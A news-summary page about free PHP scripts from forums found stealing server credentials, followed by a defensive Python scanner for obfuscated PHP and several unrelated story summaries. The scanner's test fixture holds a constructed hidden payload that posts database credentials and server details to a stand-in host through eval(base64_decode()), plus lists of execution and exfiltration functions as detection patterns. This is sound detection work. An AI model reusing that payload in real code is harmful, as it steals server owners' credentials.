ShortSingh

Free PHP Scripts on Forums Found Stealing Server Credentials and Sensitive Data


A developer found that a free PHP script downloaded from file-sharing sites such as 4shared and from online forums carried hidden malicious code. Once run, the script silently collected sensitive server data, including email credentials, usernames, passwords and environment details, and transmitted it to an external destination without the user's knowledge. The payload was hidden with base64 encoding and executed through a dynamic execution function, so a casual read of the file did not reveal what it did. The incident illustrates the risk of deploying unverified third-party code, especially free scripts distributed outside the project's own repository or a reputable package registry. Security experts recommend auditing all third-party code for suspicious constructs such as eval() and base64_decode() before it reaches a production environment. A practical caveat: those two names are only a first pass. Obfuscated PHP commonly stacks further layers such as gzinflate() and str_rot13(), or hides the callee behind a variable function call ($f = 'ev' . 'al'; $f($code)), and base64_decode() also has legitimate uses, so the decoded payload itself has to be read to tell an embedded image from a backdoor.
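The audit step above, as an added example that is not code from the original article or from ShortSingh: a small static triage pass in Python that flags dynamic-execution sinks and decode-then-execute chains such as eval(base64_decode(...)), then decodes base64 literals itself and re-scans the hidden layer for exfiltration indicators (outbound HTTP, mail(), $_SERVER, getenv()). The two PHP inputs, the example.invalid collection URL, and the hidden payload are all constructed for the demo; the indicator lists are ordinary obfuscation and exfiltration patterns, not anything taken from the article.

```python
import base64
import re
import zlib
from typing import Optional

# Added example, not code from the article: a static triage pass over PHP source.
# It flags dynamic-execution sinks and decode-then-execute chains such as
# eval(base64_decode(...)), then decodes base64 literals itself and re-scans the
# hidden layer for exfiltration indicators. All sample PHP below is constructed.

EXEC_SINKS = ("eval", "assert", "create_function", "system", "exec",
              "shell_exec", "passthru", "popen", "proc_open")
DECODERS = ("base64_decode", "gzinflate", "gzuncompress", "str_rot13",
            "hex2bin", "urldecode", "strrev")
EXFIL_CALLS = ("curl_init", "curl_setopt", "curl_exec", "file_get_contents",
               "fsockopen", "mail", "getenv")
EXFIL_TOKENS = ("$_SERVER", "$_ENV", "http://", "https://")

CALL_RE = re.compile(r"\b([A-Za-z_]\w*)\s*\(")
VAR_CALL_RE = re.compile(r"\$[A-Za-z_]\w*\s*\(")  # $f(...) hides the callee name
B64_LITERAL_RE = re.compile(r"['\"]([A-Za-z0-9+/=\s]{40,})['\"]")
CHAIN_RE = re.compile(r"\b(%s)\s*\(\s*(%s)\s*\(" %
                      ("|".join(EXEC_SINKS), "|".join(DECODERS)), re.I)


def _decode_layers(blob: str) -> Optional[str]:
    """Undo the stack an obfuscator typically uses: base64, optionally raw deflate.
    Returns the decoded text only if it is mostly printable, i.e. looks like source."""
    try:
        raw = base64.b64decode(re.sub(r"\s", "", blob), validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None
    candidates = [raw]
    try:
        candidates.append(zlib.decompress(raw, -15))  # what PHP gzinflate() would yield
    except zlib.error:
        pass
    for cand in candidates:
        try:
            text = cand.decode("utf-8")
        except UnicodeDecodeError:
            continue
        if text and sum(c.isprintable() or c in "\r\n\t" for c in text) / len(text) > 0.95:
            return text
    return None


def scan_php(src: str, depth: int = 0, max_depth: int = 3) -> dict:
    """Collect indicators from src; base64 literals are decoded and scanned recursively."""
    calls = {m.group(1).lower() for m in CALL_RE.finditer(src)}
    report = {
        "exec_sinks": sorted(calls & set(EXEC_SINKS)),
        "decoders": sorted(calls & set(DECODERS)),
        "exfil_calls": sorted(calls & set(EXFIL_CALLS)),
        "exfil_tokens": [t for t in EXFIL_TOKENS if t in src],
        "variable_calls": VAR_CALL_RE.findall(src),
        "decode_exec_chains": [f"{m.group(1)}({m.group(2)}(" for m in CHAIN_RE.finditer(src)],
        "decoded_layers": [],
    }
    if depth < max_depth:
        for m in B64_LITERAL_RE.finditer(src):
            inner = _decode_layers(m.group(1))
            if inner is None:
                continue
            sub = scan_php(inner, depth + 1, max_depth)
            if any(sub.values()):  # keep only layers that actually contain indicators
                report["decoded_layers"].append({"preview": inner[:60], "findings": sub})
    return report


def severity(report: dict) -> str:
    """high: decoded code is executed, or a hidden layer carries exfil indicators;
    medium: a dynamic-execution sink or variable function call with no visible chain;
    low: decoders alone, which is what embedded images and tokens look like."""
    hidden_exfil = any(layer["findings"]["exfil_calls"] or layer["findings"]["exfil_tokens"]
                       for layer in report["decoded_layers"])
    if report["decode_exec_chains"] or hidden_exfil:
        return "high"
    if report["exec_sinks"] or report["variable_calls"]:
        return "medium"
    return "low"


# Constructed sample: the hidden layer a trojanised "free" script carries, base64-encoded below.
_HIDDEN_PAYLOAD = """$d = array('host' => $_SERVER['SERVER_NAME'], 'db' => DB_USER . ':' . DB_PASSWORD,
           'path' => getenv('PATH'));
$ch = curl_init('http://example.invalid/collect.php');
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($d));
curl_exec($ch);"""

MALICIOUS_PHP = ("<?php\nfunction send_form($to, $msg) { mail($to, 'Contact form', $msg); }\n"
                 "eval(base64_decode('%s'));\n"
                 % base64.b64encode(_HIDDEN_PAYLOAD.encode()).decode())

# Constructed benign sample: base64_decode() serving a 1x1 PNG, not code.
BENIGN_PHP = ("<?php\nheader('Content-Type: image/png');\necho base64_decode('iVBORw0KGgoAAAANSUhEUg"
              "AAAAEAAAABCAYAAAAfFcSJAAAADUlEQVR42mNkYPhfDwAChwGA60e6kgAAAABJRU5ErkJggg==');\n")

if __name__ == "__main__":
    for name, src in (("free_script.php", MALICIOUS_PHP), ("pixel.php", BENIGN_PHP)):
        rep = scan_php(src)
        print(name, severity(rep), rep["decode_exec_chains"],
              [layer["findings"]["exfil_calls"] for layer in rep["decoded_layers"]])
```

Run as-is it rates the trojanised script "high" (the eval(base64_decode( chain plus curl_exec and $_SERVER in the decoded layer) and the image-serving script "low", which is the distinction a plain grep for base64_decode cannot make. The regexes are deliberately simple; a determined author can split names with string concatenation or chr() and defeat them, so treat the output as a triage list for manual review, not as a clean bill of health.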

Read the full story at DEV Community

This is an AI-generated summary. ShortSingh links to the original source for the complete article.


Related stories

Programming · DEV Community

React 19 useCallback Stale Closures Can Leak Tenant Data in Multi-Tenant Apps

A developer shipping a multi-tenant AI dashboard discovered that React 19's useCallback memoization can cause stale closures that leak one tenant's data into another tenant's API calls. The bug surfaced in production when rapid tenant switches occurred while async AI requests were still in-flight, resulting in Tenant B's Claude API calls inadvertently using Tenant A's system prompts. Although the dependency array correctly lists tenantId, it only guards against stale values at render time and cannot cancel or correct closures already captured during ongoing async operations. The issue is particularly hard to catch because it leaves no TypeScript errors, no failed requests, and no visible staging-environment symptoms. In SaaS applications, this silent timing flaw constitutes a data isolation violation that can affect hundreds of tenant accounts concurrently.

Programming · DEV Community

Lightchain.ai Flagged as Fraudulent Platform After User Loses $4,321

A user reported losing $4,321.95 on Lightchain.ai after a withdrawal attempt failed and their account balance disappeared. The platform is alleged to be an exit scam that uses fake AI trading bots and malicious smart contracts to block withdrawals. Victims are reportedly pressured into paying fabricated 'upgrade' or 'tax' fees under the false promise of unlocking their funds, but payments yield no results. Security experts warn that any additional fees paid to such platforms only benefit the scammers, who continue to invent new reasons to withhold payouts. Affected users are advised to report incidents to the FBI's Internet Crime Complaint Center at ic3.gov and to avoid unverified third-party recovery services.

Programming · DEV Community

Missing one config line cost a solo dev over $600 in excess AI agent spend

A solo developer auditing 34 days and roughly 26,000 traces of AI agent usage discovered that 22.6% of model-routing decisions deviated from his intended policy, amounting to $1,248 in excess list-price spend. The single largest cost cluster — $657 — stemmed from a missing 'model:' line in subagent definition files, which caused cheaper mechanical tasks to silently inherit and run on the more expensive parent model. He also found that live session logs from Claude Code rewrite themselves over time, meaning usage dashboards built on those files can drift; an append-only immutable snapshot resolved the discrepancy. An attempted quality comparison between expensive and cheaper model outputs was inconclusive due to methodological flaws, including context mismatch and self-recognition bias during blind judging. The developer published the full audit, including its failures, as part of an open instrumentation SDK called traceguard, designed to track model usage locally without sending data externally.

Programming · DEV Community

Why Most 'Adaptive' Apps Are Just If-Else Logic in Disguise

Many apps marketed as adaptive or personalized rely on simple heuristics — showing harder content after a correct answer and easier content after a wrong one — rather than true adaptive logic. A genuinely adaptive system maintains a continuously updated model of a hidden user variable, such as ability or preference, treating each new action as evidence rather than a standalone trigger. A developer building an exam prep platform identified three essential components for real adaptivity: estimating hidden user state from behavior, selecting the next input calibrated to that estimate, and maintaining a pipeline that keeps generating relevant content. Without all three working together, even a sophisticated statistical model cannot deliver meaningful personalization. The distinction matters because thin underlying models produce unstable, noisy, and non-generalizable experiences regardless of how they are marketed.
